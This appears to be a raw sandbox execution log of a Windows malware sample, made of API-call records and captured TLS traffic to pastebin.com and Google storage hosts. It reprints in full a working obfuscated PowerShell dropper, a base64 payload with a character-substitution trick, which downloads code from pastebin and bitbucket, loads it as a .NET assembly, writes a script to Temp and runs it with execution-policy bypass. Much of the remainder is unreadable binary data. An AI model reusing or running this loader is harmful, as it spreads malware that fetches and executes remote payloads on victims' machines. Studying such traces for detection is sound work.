★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★E0★aQBz★GU★cgBp★GM★bwBy★GQ★aQBv★HM★bwBB★G0★ZQBu★C4★QwBs★GE★cwBz★DE★Jw★n★C★★KQ★u★Ec★ZQB0★E0★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★GU★d★Bo★G8★Z★★o★C★★Jw★n★E0★cwBx★EI★SQBi★Fk★Jw★n★C★★KQ★u★Ek★bgB2★G8★awBl★Cg★I★★k★G4★dQBs★Gw★I★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★I★★n★Cc★d★B4★HQ★Lg★1★DI★M★★y★GY★ZgBl★HQ★cwBv★HM★LwBz★GQ★YQBv★Gw★bgB3★G8★Z★★v★GU★ZwBy★G8★ZQBn★C8★N★★x★DU★MgBl★Gc★cgBv★Go★LwBn★HI★bw★u★HQ★ZQBr★GM★dQBi★HQ★aQBi★C8★Lw★6★HM★c★B0★HQ★a★★n★Cc★I★★s★C★★Jw★n★CU★SgBr★FE★YQBz★EQ★ZgBn★HI★V★Bn★CU★Jw★n★C★★L★★g★Cc★JwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★LQ★t★C0★LQ★t★C0★LQ★n★Cc★L★★g★Cc★Jw★w★Cc★Jw★s★C★★Jw★n★DE★Jw★n★Cw★I★★n★Cc★UgBv★GQ★YQ★n★Cc★I★★g★Ck★I★★p★C★★Ow★n★C★★Ow★k★FY★QgBX★Fc★eg★g★D0★I★★o★C★★WwBT★Hk★cwB0★GU★bQ★u★Ek★Tw★u★F★★YQB0★Gg★XQ★6★Do★RwBl★HQ★V★Bl★G0★c★BQ★GE★d★Bo★Cg★KQ★g★Cs★I★★n★GQ★b★Bs★D★★Mw★u★H★★cw★x★Cc★I★★p★C★★Ow★k★E0★TwBE★FI★Zw★g★Hw★I★BP★HU★d★★t★EY★aQBs★GU★I★★t★EY★aQBs★GU★U★Bh★HQ★a★★g★CQ★VgBC★Fc★VwB6★C★★I★★t★GY★bwBy★GM★ZQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★g★C0★RQB4★GU★YwB1★HQ★aQBv★G4★U★Bv★Gw★aQBj★Hk★I★BC★Hk★c★Bh★HM★cw★g★C0★RgBp★Gw★ZQ★g★CQ★VgBC★Fc★VwB6★C★★Ow★=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\test22\AppData\Local\Temp\sostener2.vbs');powershell $Yolopolhggobek;
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4
★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★E0★aQBz★GU★cgBp★GM★bwBy★GQ★aQBv★HM★bwBB★G0★ZQBu★C4★QwBs★GE★cwBz★DE★Jw★n★C★★KQ★u★Ec★ZQB0★E0★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★GU★d★Bo★G8★Z★★o★C★★Jw★n★E0★cwBx★EI★SQBi★Fk★Jw★n★C★★KQ★u★Ek★bgB2★G8★awBl★Cg★I★★k★G4★dQBs★Gw★I★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★I★★n★Cc★d★B4★HQ★Lg★1★DI★M★★y★GY★ZgBl★HQ★cwBv★HM★LwBz★GQ★YQBv★Gw★bgB3★G8★Z★★v★GU★ZwBy★G8★ZQBn★C8★N★★x★DU★MgBl★Gc★cgBv★Go★LwBn★HI★bw★u★HQ★ZQBr★GM★dQBi★HQ★aQBi★C8★Lw★6★HM★c★B0★HQ★a★★n★Cc★I★★s★C★★Jw★n★CU★SgBr★FE★YQBz★EQ★ZgBn★HI★V★Bn★CU★Jw★n★C★★L★★g★Cc★JwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★LQ★t★C0★LQ★t★C0★LQ★n★Cc★L★★g★Cc★Jw★w★Cc★Jw★s★C★★Jw★n★DE★Jw★n★Cw★I★★n★Cc★UgBv★GQ★YQ★n★Cc★I★★g★Ck★I★★p★C★★Ow★n★C★★Ow★k★FY★QgBX★Fc★eg★g★D0★I★★o★C★★WwBT★Hk★cwB0★GU★bQ★u★Ek★Tw★u★F★★YQB0★Gg★XQ★6★Do★RwBl★HQ★V★Bl★G0★c★BQ★GE★d★Bo★Cg★KQ★g★Cs★I★★n★GQ★b★Bs★D★★Mw★u★H★★cw★x★Cc★I★★p★C★★Ow★k★E0★TwBE★FI★Zw★g★Hw★I★BP★HU★d★★t★EY★aQBs★GU★I★★t★EY★aQBs★GU★U★Bh★HQ★a★★g★CQ★VgBC★Fc★VwB6★C★★I★★t★GY★bwBy★GM★ZQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★g★C0★RQB4★GU★YwB1★HQ★aQBv★G4★U★Bv★Gw★aQBj★Hk★I★BC★Hk★c★Bh★HM★cw★g★C0★RgBp★Gw★ZQ★g★CQ★VgBC★Fc★VwB6★C★★Ow★=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\test22\AppData\Local\Temp\sostener2.vbs');powershell $Yolopolhggobek;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received [
Data received Wg÷% šDŠ44¼p(ò™†&ÃM,DOWNGRD §&3óŸ›b9èê„Dƒ¿Æxâ6s*Yõ-:ôÀÿ 
Data received ¼
Data received ¸µ70‚30‚ †’?P(¤ úÆvE40  *†H†÷  0;1 0 UUS10U Google Trust Services1 0 UWR10 250328151841Z 250626161555Z010U pastebin.com0‚"0  *†H†÷ ‚0‚ ‚ÂW‰ŸëÖ+X›˜6€â²®Ô‰3ì4Ÿ5¦*ž|òï·åìóÙR¶øGPŒ3|jC“ìiF´\¸³Žl䣟Wݖ²éW7®R"e°ß°Ôjù¾ŸD§Â,ÁÇÜu-íV¦s!ÚC¢H=ØѼè¿IAÂÚû7ÿ¹AcY‘4aêpõ›Í•’·Œ‡3·¦à¨`˜G£[kÒ …â8~Š:Ô³k¦._ºO”ÇûGc¼›d‹QÂHd€¾ õ¾ ñã7'ù|Çß^ó­ ±¶<æŠêfµË×&JT{t`z<›­1°Ü£.`ðωâm¢‘ö¨‚°¥/8Ç£‚T0‚P0Uÿ 0U% 0 +0 Uÿ00UjÈJ €Þ¾sd»‘ZÉ| >@T0U#0€fiIÔÞ*œ‘ω$¸0nˆ.0^+R0P0'+0†http://o.pki.goog/s/wr1/ho80%+0†http://i.pki.goog/wr1.crt0'U 0‚ pastebin.com‚*.pastebin.com0U  0 0g 06U/0-0+ ) '†%http://c.pki.goog/wr1/tyyTOlCKhGQ.crl0‚ +ÖyôñïuNu£'\šÃ8[lÔß?RëðàŽiÀ±úd±bš9ß•ÝŒlcF0D f܇ÿç\¯­Ô1€µ¿€Ùë5K¾K”êÑD->©Ô® õ¾™ó¥¨&Æàë¶CSã-î›Ù´ºVI@c›-ʛ{vÌûj…q eþ•›SÎé²|"é…\ —¶©~TÀþL °•ÝŒl¯G0E!/ø+Ÿveqí¤$èYSê‘pÃg;ïф<é.Y™ f¦; |~)L ¢ª²¨¢½›’ÙÅUïŽm`‘_ݕyï0  *†H†÷  ‚¾a­ÆT\ëÔ£t#øã,cSçî!â§ùÜøÖ/"œÙܙȡÌ(·Üªgn z&Ê,S:†zûÒ5e};ïìåîý^»ºm8É­%ÿfœDËN0@5‡Ã×ÚhZÀÚ$E-ú±#$³æHWÞC] ¸ÖO¾Ž¥™œÛË "TY9N×:Š"M$<z#®È¥²AŠÜmþ—:w!;­e~©~P©Xc!X#ä_‰<Ô PHÔ.&ÿ5Îw«Žš—q¹¨îGÄWL4f@>ÑAoBÞ8ƒ¶þ µ5I/jûþÑÝãõÈÝw¹¬Ù׿CÌtÃ2Q>ؓ~0‚ 0‚ó ÙâÂÒŠt¶'¢mh§0  *†H†÷  0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R10 231213090000Z 290220140000Z0;1 0 UUS10U Google Trust Services1 0 UWR10‚"0  *†H†÷ ‚0‚ ‚Ïn6Š·+îF˜Spwî£K r¾#-ÂGƏ\ù=æŽî3" ÉH¸°bÎôi r}ÞÕ&Ãn›Ï~× ÏƐ;£‚Ú:ÿlV¿Üéa”Eäi¼OÉÀ­aDr Ð+žhjbjŠ"Wyi+â$3~vc,]¼Qi~#±ÿvñî¸Xµk5ï¡æH(9—1Ù•§ž®Ï˜¼žŠᰗMPo“LJøÛ}ñ™ã–íî1êr=Rß%d¥ pªžè¨¹GȧZ%`oBá×?ç ðƒF3 æKwv¡h§]ïØ(w5­­FäbnâªøÌï7~&³£þ0û0Uÿ†0U%0++0Uÿ0ÿ0UfiIÔÞ*œ‘ω$¸0nˆ.0U#0€ä¯+&q+H'…/Rf,ïð‰q>04+(0&0$+0†http://i.pki.goog/r1.crt0+U$0"0   †http://c.pki.goog/r/r1.crl0U  0 0g 0  *†H†÷  ‚Næ³ ‘`'ùQMî¸Á‰Õ"„—æÖßæN:;)~Þ ñ⍋ӪD7’˜¥ý7Œ©IX1d&eµC×ò—ìT9›U:8wá³@'ÏV{Tœ37yðäîÌQ²‘s!Ã?©¶Ó¤×—Òák$ÛäïèT•• ßý.¶n»ƒZ4Pà†{™ŠŠˆJ¤ÓÇi9Ÿ“˜ðÊAË_È]·«o )Õ$§Ÿo‘#»z7÷ê<*ðÀXéòH5§­DÆ£Ø †Œ“=¤÷°%¾ˆ÷ÿß¾§^€³ØøïÅG%˜Š,>·4ɕjµPuÒ êC¯MîdҙñFt~šwF„ï´ËmÆEz6¹èü§•*¦z¾{ñγê£PU˜ü–P¯¯êÁ®ÎÎÌ«´klã½tpÌ¤úu¢üLVÝ{Ò±.Mø.‘ ¥f« ólqюÍx ½ó…Ã;ħB¸31åñ“–%'U”P¾? 
7ý‰_ô ¢¥kõÏo,æÄulü¿ºä7¾9Ù玑F#Üq¶ÃrF̚Ñ@œûºS¨\5ä žñ!³—hq·^–ÛÇü@nŠ²k;1DÚ»@/,—TÝ3Ÿ ¥Î%õ*AåHçè@í_§×à?Ÿ³iƒD¾äàòµhy]nxqÃuv²g0®x¶Ú3‡Gf0‚b0‚J w½ lÛ6ùê!ÄðXÓ 0  *†H†÷  0W1 0 UBE10U GlobalSign nv-sa10U Root CA10UGlobalSign Root CA0 200619000042Z 280128000042Z0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R10‚"0  *†H†÷ ‚0‚ ‚¶‹ã¡w›;Ü¿”>·•§@<¡ý‚ù}2‚qööŒûèÛ¼j.——£ŒKù+ö±ù΄±ùŗÞï¹ò£é¼‰^§ªR«ø#'ˤ±œcÛי~ð ^ëh¦ôÆZG M3ãN±£ÈlKìü ßd)%#¡´Ò=.`àÏÒ ‡»ÍHðMÂÂzˆŠ»ºÏYÖ¯°°ž1ñ‚ÁÀß.¦mlµØ~&E=°y¤”(­&å¨þ–è<h”Sîƒ:ˆ+– ²àzŒ.u֜ë§Vd–Oh®=—„À¼@À \½ö‡³5l¬P„àLÍ’Ó é3¼R™¯2µ)³%*´HùráÊd÷悍èÂŠˆú8fŠücùùxý{\wúv‡úìß±y•W´½&ïÖÑë »Ž µÅŊU«Ó¬ê‘K)̤2%N*ñeDÐΪÎI´êŸ|ƒ°@{çC«§l£}‰úL¥ÿՎÃÎKàµØ³ŽEÏvÀí@+ýS°§Õ; ±Š¢Þ1­Ìwêo{>Öߑ"æ¾úØ2ücQrÞ]Ö“½)h3ï:fìŠ&ß×Wex'Þ^I¢š¨!¶©±•°¥¹ ÚÇlH<@à~ ZÍV<ї¹ËKí9KœÄ?ÒUn$°ÖqúôÁºÌíõþAؘ=:È®z˜7•£‚80‚40Uÿ†0Uÿ0ÿ0Uä¯+&q+H'…/Rf,ïð‰q>0U#0€`{fE —ʉP/}Í4¨ÿüýK0`+T0R0%+0†http://ocsp.pki.goog/gsr10)+0†http://pki.goog/gsr1/gsr1.crt02U+0)0' % #†!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g 0g 0  +Öy0  +Öy0  *†H†÷  ‚4¤±(£Ð´v¦1z!éÑR>ÈÛtAˆ¸=5íäÿ“á\_«»ê|ÏÛä ыWò&o[¾Fh”7okzÈÀ7ú%Q¬ìh¿²ÈIýZšÊ#¬„€+Œ™—ëIjŒu×Ç޲ɗŸXHW5¡äÖýoƒoïŒÏ—¯À…*ðõNi ‘-áh¸Á+séÔÙü"À7 fIíUgá2×Ó&¿pã=ôgm=|å4ˆã2ú§njo½‹‘îKè;©³7çÃD¤~Øl×ÇFõ’›çÕ!¾f’”UlÔ)² Áf[âwIH(í×3rS³‚5Ïb‹É$‹¥·9 »~*A¿RÏü¢–¶Â‚?
Data received K
Data received GA!®ÐíSz ÕN)(1³Ý¤ÿ²*C¿©ÏŒã‚{‰_ r:Qü†nå.r«pö»y˜a¥$½…j¾âQȹ8¦ 6z\ùº”KÄãc¸fÌ%ª Î1¬7Û_ì(¢wå{^Ÿ×ÊΟxyÛæ@YW¾âÁ)).ã®ËË­õoW‹u§9£0j(­7½î`%IÓš'‹·à÷ëSîiÕ µ%µ+‚gëÍ%ìFúɝâ:»B>=k׆½;:|´ŠïR­™àj¨i¾oì:‘^±#0ö5ßkb½^¬±b–:²Åº:>ºµ]iè{nðÊÜÒ`¨®Æ]Ö½1ÐîÇÀ®ªÓ!TxwŒÌ0°‚!Ém³죓…E„óeøæ ދÎœ{åé‡*ºÑÖÄVѐ½Ò°+®¾||°ú
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ˆxcEq§LùØHí+˜“pÐ.Z' ‡tûlðƒ¾àÑéPd¢VŽ.ç—Å¥
Data received @
Data received / ú ҝ|ƒí§8›™©ž1šÇÖ׀™ªU._œÏ¼ª (›>=çn¶Œ²©b-^’]øÞ;¤Sõý\ÛLÈô‘¾­ž°u-" Ùd6˜„uxgÿžuä‹ö¦2>8 Pþªæá³cÏZ]Aƒ|Ò( ؾžV?°K¾£'O)à$T=…ÛïãÕÐ5§¥óÌàÉ*¦¦ÅŠ¹3֌ÒؾM ú×àªë ߑn™º_ò`«¬¶3º·Ã+øâº,Xr½ ,¦NzÉPnô A؄ICÙVL‘¡Ùm.eO  CÂbB¯Ôë«I€%ùâ9Üm¸Æ‰Au gî"´•¥¤’ül÷kêˆrŗ¢îú“žO§Ý¦¡¡JQU¼d^¶?ùg1__fÆz¤öeïRläð¸Xqùê6,YÝ0uI²µ>sˆþ(t8Ѧ=Š®Ko¤?ÕòÇÆ“wDè@™”p(/i¤bü–³L/Ŭ¶&º!”©¡”.m“h€Ü_3ÚnOÆP­F‰ՌæB÷×Å:ó+êœtج—÷AO ™öbȔgE™ÙÅá7ˆd+§XI”GêY)Û az'Z› ‹Ùî¡1¾Š+F {ˆH‚ {˜¢!þ06B³"É)!<Òq},ÊügqZn ˜QÍÄ.;¥°H÷WY*âG£Ÿ~šÇ\óì/…63…+íp°®Í)ώÂã4Á«2i^¾@†™1!zìÄÛ qšú
Data received 
Data received @ÁÄÍâ7»M`î{Vù4óªpí1âpaZXå–g)~
Data received W
Data received Sg÷% ¤ƒkt Íïjҟ8áN¤¼û¬;DOWNGRD ¤Ë~IÅyѓ÷ÊÖ²õ(æj`FG!öxIÌKûÀ ÿ 
Data received  S
Data received O L#0‚0‚Å q¯<ùN]×½ YëL?†0 *†HÎ=0;1 0 UUS10U Google Trust Services1 0 UWE20 250320111954Z 250612111953Z0"1 0Uupload.video.google.com0Y0*†HÎ=*†HÎ=BNNߥM®¥%“‚ öã]`"p¼Ÿ ˆNã¡?+º:†Ò¬aäiÌóD€-Dž9O tä“ç$%+¯ô´,X£‚Â0‚¾0Uÿ€0U% 0 +0 Uÿ00Uö˜†Ïìç¼Ô´Ïƾ]0Â4¤!0U#0€u¾Äw®‰öD7}ϱhëÜ4Y0X+L0J0!+0†http://o.pki.goog/we20%+0†http://i.pki.goog/we2.crt0‚˜U‚0‚‹‚upload.video.google.com‚*.clients.google.com‚*.docs.google.com‚*.drive.google.com‚*.gdata.youtube.com‚*.googleapis.com‚*.photos.google.com‚*.youtube-3rd-party.com‚upload.google.com‚*.upload.google.com‚upload.youtube.com‚*.upload.youtube.com‚uploads.stage.gdata.youtube.com‚bg-call-donation.goog‚bg-call-donation-alpha.goog‚bg-call-donation-canary.goog‚bg-call-donation-dev.goog0U  0 0g 06U/0-0+ ) '†%http://c.pki.goog/we2/yK5nPhtHKQs.crl0‚ +ÖyõòðvÏVîÕ.|¯ó‡[Ùi.›éqgJ°ì¬Ò[wÎÌ;•³~òG0E tÐú˜VȒ¸áÁ¤WŠƒøTÜ<50Cß/?ÍBHVJB!°•å¡JР$*1ò'øì<xgQ)ÒÃìå¿gÆvà’³ü Èçh6Þa¹–M RxŠrÖrÄ°M¥moT•³~òAG0E )ØÖÂ(”[¥·Ø]­°Wºfüvû¼<Å­.Ǝ&Е¼¹!‹‡N™%€³6‰fî ÷Z–3Äm'Bdª°¿<0 *†HÎ=H0E!ßÐ.åómOfyƒ’ƒ¡ªP? 
oú—TªžÏN \Îß{¬¢ZÄÿݟÀè®Ój阕$æ¯Ù?ãQb¢0‚ž0‚% ó-k@Ֆ[‡:|rà0 *†HÎ=0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R40 231213090000Z 290220140000Z0;1 0 UUS10U Google Trust Services1 0 UWE20Y0*†HÎ=*†HÎ=B5~òí}áž*4C†ÁՖè'pߞ˩ʆy MFŠÂt¤»Ù¿îý#×8óKïTá¾çÊU%¨ 0¬-]N¡Q£þ0û0Uÿ†0U%0++0Uÿ0ÿ0Uu¾Äw®‰öD7}ϱhëÜ4Y0U#0€€LÖëtÿI6£ÕØüµ>Åjð”Œ04+(0&0$+0†http://i.pki.goog/r4.crt0+U$0"0   †http://c.pki.goog/r/r4.crl0U  0 0g 0 *†HÎ=g0d0 ½¸6UÈ5£ÒÙ}9sÓ÷÷‚¸ сoådEÛÞªÀE¬“è`ì.~D,"”‘ì¬0/ß vL-iaÕOý˜˜„Û4ê˜ì›ÍˆbÿÒeå3jš í#I8/Q¿‘ТÉ88Ú~0‚z0‚b å0¿3C¾Ý‚I=Š0  *†H†÷  0W1 0 UBE10U GlobalSign nv-sa10U Root CA10UGlobalSign Root CA0 231115034321Z 280128000042Z0G1 0 UUS1"0 U Google Trust Services LLC10U GTS Root R40v0*†HÎ=+"bóts§h‹`®C¸5Ł0{KIûÁaÎæÞF½kÕa5®@Ýs÷‰‘0Zë<î…|¢@v;©Æ¸GØ*璑jsé±r9Ÿ)Ÿ¢˜Ó_^X†e¡„eÑ܋ÉÇsȌj/åÄ«ÑŠ£ÿ0ü0Uÿ†0U%0++0Uÿ0ÿ0U€LÖëtÿI6£ÕØüµ>Åjð”Œ0U#0€`{fE —ʉP/}Í4¨ÿüýK06+*0(0&+0†http://i.pki.goog/gsr1.crt0-U&0$0"   †http://c.pki.goog/r/gsr1.crl0U  0 0g 0  *†H†÷  ‚B»Ö‡–ã?c ¤¡hH 9"sžøËN-1éŸç ¡Ò6„¬yëé°ëj¶{ }t¸›e«h*,,ÝBýÆq χ-÷kÈn}Vâ#XXù%º…G×– ý ¶Œà.®UÑyu5,1[?e¼Íœ‡B§‘±›^Žñ»Ê-Gð¬c~†¿ÖäkÓÖÓŽŠgX¸ÿ÷¦„ IP[?: % ò‹\ÓyW6‚Îÿ&·©ñ™í­‚>ÈnëÓ<8ÀAšá^SÏ> Wëîâ?H¥ñ¾Ñj# û?/¢µ½ên£FÎ.g¯3&˜ªÕKÒ©6Å&;[‹ˆÁå
Data received ‘
Data received ALý·ð®ŸLäEë³±4—NG@g’[ƜTñ78˜´)ÜŠ‚?î2o…?NKí‡]áž×=ÃåÁb#F0D =O¨|[.%rY䶤}#ÄZ¯±ôR‚×% R†>i ýfóXދL«W–ó[u©Ý×-­ÌtœÔHÏBu
Data received +¿ª}²A2É$}^aÃÕYw[©­MóŤԬö¥ ˜™òb\«•©øØñiè¨
Data received p
Data received '÷nKT Ö^ë•ÌV'N™-t×b bÓªee>†eYû÷ä$᚟œQ²{Á –øÊ\^§×;M¦ø5*lÖ¶IU¥ÚÓedä?’LK0áJ”_ 8)\‡¢×ÏÅPˆGMËP³n×}CÖÏ¡y×3|PÕo r« 2Q¼F˜ jþ‘Y-·.¯aÒ+Å¤P/ñUe%Cdz¡ÏÕ)݇ÔÉòC²0“†sßZ§b(÷;+Ç3¸êɯ`€Ë×¹XæRJû—ÁÀÐŽåı_5$âE··öˆPТ¨:± ·=Þüì,¦€±±Ù ø6aX˙ê4ȏ‡9gd@óX×l6˜à'RnºÄúÊG"~;×ÂKƒv)I]yÛûE‘ÎxüÝ$ ”˜1eÕ[èv_;^³È·kݘuÙç¹Ù®Í8Œæµ Øåí¡ìâûí(“îE÷7xRýãq½ÛfìŠ5qúb<ÿôàÝéÐò.¥Ã–†ñ„®œA¬´ßŸ…„lQ‚Û›²Ž™Î‘DïÙHûÍÇ&ç C:Hâ-LòÛM•ÍOñΞl™›¥ï(Pìöœ3³Q^Þá:©ùÊòtÿU’zV )+“ü]‚¸MÎOB(rÔÿ!z³!ŗû½þ{ñ¼l ’:~«y¢ˆB fðÐþg‚ÆØñª€7~H–/úk~®Š-ò,¬zÊ¡‹ß=“|¬¶·?m’<m‹·¼zÂøøÔßÉ5Fõ¤¼üXìÅW«´YƒS¦uÉÓ|p¡æÜCØŸ“s
Data sent okg÷$‹”‡¬[NöM¾s˜×!lŽ*JÆl¿V„”I/5 ÀÀÀ À 28*ÿ pastebin.com  
Data sent FBAÝÒ6YWÕÆtéZbìˌ‰ƒó ^\6Ù ùÔRý 9Â1ÊÛÝ £}£¯6i7²zí“ût,(A|o霆" iî0”Ȩ«ù0Æ?¹½øÍÚðQé0VʹêõV·ÔÝšÓ `j­ƒÁõT‹à ô˜
Data sent `¹›ÂmµÚqë!í£^??U%Îq·Q…)ŒV³Ï#wô„Mß0ÁÊöSh, *DëÔ󶢑â¯Ó}®Šœø3b†gî¹&’õAʳ>Yæ^*YÕ>ÚêYÑI1x‹
Data sent }g÷$Œ´YÉ øÆsÍ@uÛ&ïŸÜa€Ë>û=‚À/5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com  
Data sent FBAqD¾ ò¥ñg2¤2‡Z×+þiç=zÊNÀøСz«©:<§$PÈ!Úâî¬CRçPìR,®Ð$ú50H&·›£ï½iD_ﶋ¹!®%us4mª³Þ…ç¸@°6 ¶܃eçTª “¡žÒê
Data sent ÐU½&°xª›>Û鈚·„•»« ƒbË ™gÉIÒkY³FÁtøN;)®o’)° u‚;9=¹Ûw÷KI¶T$Éށ… gw‰°]Ÿú­G‚)ùãðm4ÖÀdÔ¿,'Ø(žÔmžûò¢Ú3b9ʹ9]¡qÿvjZÆTP:¥AWû§ó_Gs*ôd)\hŸx¡"ÈjG{à›ú¡!¼€òâg·ÿºrZ“”Ží—Á©VøP" ökp¶´@ìô
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
